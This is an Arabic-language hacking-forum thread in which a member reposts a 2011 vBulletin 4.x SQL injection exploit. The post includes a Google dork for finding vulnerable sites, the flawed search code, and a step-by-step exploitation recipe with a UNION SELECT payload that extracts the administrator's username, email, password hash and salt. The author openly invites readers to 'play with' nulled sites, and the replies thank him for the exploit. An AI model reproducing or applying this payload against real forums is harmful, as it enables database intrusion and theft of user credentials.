Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

ثغرات المواقع والسيرفرات وكيفية استغلالها وشروحات مع تطبيقات عملية على استغلال الثغرات وتطبيقها


إضافة رد
قديم 07-21-2011
  #1
R3d-D3V!L
V.I.P
 الصورة الرمزية R3d-D3V!L
 
تاريخ التسجيل: Apr 2005
المشاركات: 40
شكراً: 10
تم شكره 9 مرة في 5 مشاركة
Thumbs up Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day



كود PHP:
 Exploit TitleVbulletin 4.0.=> 4.1.3 (messagegroupidSQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S   
# Software Link: [[url]http://www.vbulletin.com/][/url]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [[url]http://members.vbulletin.com/][/url]
######################################################################################################
Vulnerability:
######################################################################################################
Vbulletin 4.x.=> 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
#####################################################################################################
Vulnerable Code:
#####################################################################################################
File:    /vbforum/search/type/socialgroupmessage.php
Line No
388
Paramater 
messagegroupid
if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
{
$value $registry->GPC['messagegroupid'];
if (!
is_array($value))
{
$value = array($value);
}
if (!(
in_array(' ',$value) OR in_array('',$value)))
{
if (
$rst $vbulletin->db->query_read("
SELECT socialgroup.name
FROM " 
TABLE_PREFIX."socialgroup AS socialgroup
--->                 WHERE socialgroup.groupid IN (" 
implode(', '$value) .")")
}
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords 
:   Valid Group Message
Search Type 
Group Messages
Search in Group 
Valid Group Id
&messagegroupid[0]=UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,saltFROM user WHERE userid=1#
##########################################################################################
More Details:
##########################################################################################
[url]Http://www.Garage4Hackers.com[/url]
[url]http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day[/url]
###########################################################################################
Note:
###########################################################################################
Funny part was thata similar bug was found in the same modulesearch query two months backAny way Vbulletin has released a patch as it was reported to them by altexhence
customers are safe except those lowsy Admins
. And this bug is for people to play with the many Nulled VB sites out there" Say No to Piracy Disclosure ".
# 1337day.com [2011-07-21] 
http://www.1337day.com/exploits/16548
R3d-D3V!L غير متواجد حالياً  
رد مع اقتباس
قديم 07-22-2011
  #2
افتراضي رد: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

Good Exploit Thanks For The Share
__________________

Whatever U R ,U Cant Do Nothing AnyMoR With SoQoR
Coz We Can Hunt You Like A RaT
There Is Dog In The House Guys

H@CK3R M!ND غير متواجد حالياً  
رد مع اقتباس
قديم 07-22-2011
  #3
¥ŁĮĿŌ¥
SQ-TeAm
 الصورة الرمزية ¥ŁĮĿŌ¥
 
تاريخ التسجيل: Nov 2009
الدولة: بلد المليون ونصف المليون شهيد
العمر: 23
المشاركات: 1,112
شكراً: 319
تم شكره 124 مرة في 79 مشاركة
افتراضي رد: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

شكرا لك على الثغرة تسلم
__________________
لا إله إلا الله محمد رسول الله




¥ŁĮĿŌ¥ غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
0day, هجوم اليوم 0

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح أختراق VBulletin بإستخدام SQL Injection Son~OF~Poseidon !SQL 1nj3cton 15 06-19-2011 11:45 PM
Interactivefx.ie CMS SQL Injection Vulnerability HaCkEr SToOop عالم الثغرات - Vulnerabilities World 1 06-08-2010 05:39 PM
ThinkAdmin (page.php) Sql Injection Vulnerability HaCkEr SToOop عالم الثغرات - Vulnerabilities World 0 02-05-2010 05:26 AM
SQL Injection Vulnerability [email protected] M!ND عالم الثغرات - Vulnerabilities World 6 12-21-2009 08:17 PM
Remote SQL Injection Vulnerability HaCkEr SToOop عالم الثغرات - Vulnerabilities World 1 11-24-2009 04:43 PM


الساعة الآن 09:45 PM.